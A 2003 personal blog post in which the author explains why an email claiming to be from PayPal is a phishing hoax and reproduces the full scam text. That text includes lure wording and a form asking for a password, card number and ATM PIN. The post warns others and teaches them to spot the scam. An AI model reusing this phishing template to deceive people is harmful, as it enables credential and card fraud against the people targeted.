John C. Kirk (johnckirk) wrote,
John C. Kirk
johnckirk

PayPal hoax

Hmm, I wasn't intending to post another entry this soon, but I just got a rather worrying email. It appears to be from PayPal, but I think it's a hoax, so be very cautious if you receive something similar.

Key things that made me suspicious:


  • They are asking for my password, which PayPal say they will never do.

  • They shouldn't need my credit card number again, and giving a random person the number/expiration date would make it very easy for them to commit fraud (they could get my street address by logging into PayPal as me, once they have my email address and password).

  • They definitely shouldn't need my ATM PIN!

  • Although the email is dated tomorrow (Wed 4th June 2003), it says that it expires May 31, 2003.

  • General point - if I'm going to enter stuff like this, I'd rather do it at the website, than typing into an email form.



Once I got suspicious, I checked the source code of the message - although it appears to be from PayPal.com (according to the "from" email address), the form is set up to send its data to quiesy.portland.co.uk. And even if they are a registered subcontractor, a file called "boyz.php" doesn't sound very official to me. And finally, this email was sent to my old Demon address, rather than my new address (which is actually registered with PayPal, so the one that they'll use to contact me) - presumably this means that it's a wide scale thing, rather than anything that's specifically targetted at PayPal users.

Anyway, I've notified PayPal of this, and they should get back to me in a couple of days to confirm/deny.

So, assuming that I'm right, it's good to know that I'm getting less gulllible as time goes by. In this case, I think it helps that we covered social engineering as part of the Cryptography/Information Security course, which I was revising a couple of weeks ago.

Oh, and one last thing - I've included the entire email below (behind the cut tags), so that you can see it for yourselves. This should be obvious, but please don't enter your details and click the "log in" button!



PayPal


Dear PayPal Customer

 


This e-mail is the notification of recent innovations taken by PayPal to detect inactive customers and non-functioning mailboxes.


The inactive customers are subject to restriction and removal in the next
3 months.


Please confirm your email address and and Credit Card info
number by logging in to your PayPal account
using the form below:





 



Email Address:
Password:
Full Name #: 
Credit Card #: 
Exp.Date(mm/yyyy) #: 
ATM PIN (For Bank Verification) #: 








This notification expires May 31, 2003


Thanks for using PayPal!

Tags: computers, paypal, scam, security
Subscribe
  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

  • 6 comments